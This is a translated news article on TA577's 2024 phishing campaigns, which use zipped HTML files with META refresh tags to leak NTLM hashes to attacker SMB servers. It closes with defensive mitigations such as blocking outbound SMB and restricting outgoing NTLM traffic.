A group of cybercriminals is behind a new campaign of phishing whose objective is to misappropriate users’ personal data.
The TA577 group, known for its involvement in the Black Basta ransomware, recently launched two waves of phishing attacks targeting employees’ NTLM hashes. These attacks were spotted by the company Proofpoint, which specializes in email security.
Used for Windows authentication, especially when Kerberos cannot be used, NTLM authentication is vulnerable to various attacks.
These hashes can be used to crack passwords, access sensitive information, and move laterally within a compromised network.
The “thread hijacking” tactic
The new campaign began with phishing emails that appear to be replies to a target’s previous chat, a technique known as “thread hijacking.”
The emails attach unique (per victim) ZIP archives containing HTML files that use META refresh HTML tags to trigger an automatic connection to a text file on an external Server Message Block (SMB) server.
When the Windows device connects to the server, it automatically attempts to perform an NTLMv2 challenge-response, which allows the server controlled by the remote attacker to steal the NTLM authentication hashes.
“ It should be noted that TA577 delivered the malicious HTML code in a ZIP archive in order to generate a local file on the host », We can read in the Proofpoint report.
Proofpoint clarifies that these URLs did not deliver malware payloads and so their primary purpose appears to be capturing NTLM hashes.
The report also mentions specific artifacts present on SMB servers that are generally non-standard, such as the open source Impacket toolkit, which is an indication that these servers are used in phishing attacks.
The X.com account of former cybersecurity professional Brian in Pittsburgh notes that for threat actors to use these stolen hashes to break into networks, multi-factor authentication must be disabled on accounts.
Vulnerability researcher Will Dormann suggests that it’s possible that hashes are not stolen to break into networks, but rather as a form of reconnaissance to find valuable targets.
“ I imagine that the combination of domain name, username and hostname could help find interesting targets “.
But who benefits from the crime?
In other words, what is the point of stealing NTLM hashes?
The hacker group known as TA577 recently changed tactics, using phishing emails to steal NT LAN Manager (NTLM) authentication hashes to carry out account hijacking.
TA577 is believed to be an initial access broker (IAB), previously associated with Qbot and linked to Black Basta ransomware infections.
Separate TA577 campaigns, launched on February 26 and 27, 2024, delivered thousands of messages to hundreds of organizations around the world, targeting employees’ NTLM hashes.
NTLM hashes are used in Windows for authentication and session security and can be captured for offline password cracking to obtain the plaintext password.
Additionally, they can be used in pass-the-hash attacks that don’t involve cracking at all, where attackers use the hash as is to authenticate to a server or server. remote service.
Stolen hashes can, under certain circumstances and depending on the security measures in place, allow attackers to escalate privileges, hijack accounts, access sensitive information, evade security products, and move laterally within a breached network.
How to counter these attacks?
Proofpoint says that restricting guest access to SMB servers is not enough to mitigate the TA577 attack because it relies on automatic external server authentication that bypasses the need for guest access.
A potentially effective measure would be to configure a firewall to block all outgoing SMB connections (usually ports 445 and 139), which would prevent NTLM hashes from being sent.
Another protective measure would be to implement email filtering that blocks messages containing zipped HTML files, as these can trigger connections to untrusted endpoints when launched.
It is also possible to configure “Network Security: Restrict NTLM: Outgoing NTLM traffic to remote servers” to prevent NTLM hashes from being sent. However, this can cause authentication issues against legitimate servers.
For organizations using Windows 11, Microsoft has introduced an additional security feature to block NTLM-based attacks on SMB, which would be an effective solution.
Faced with the exponential growth of cyber threats, it is more important than ever to protect your endpoints with an antivirus security suite worthy of the name. Discover our selection of the best cross-platform protections in March 2024.
Read more
Source : Bleeping Computer, Proofpoint
1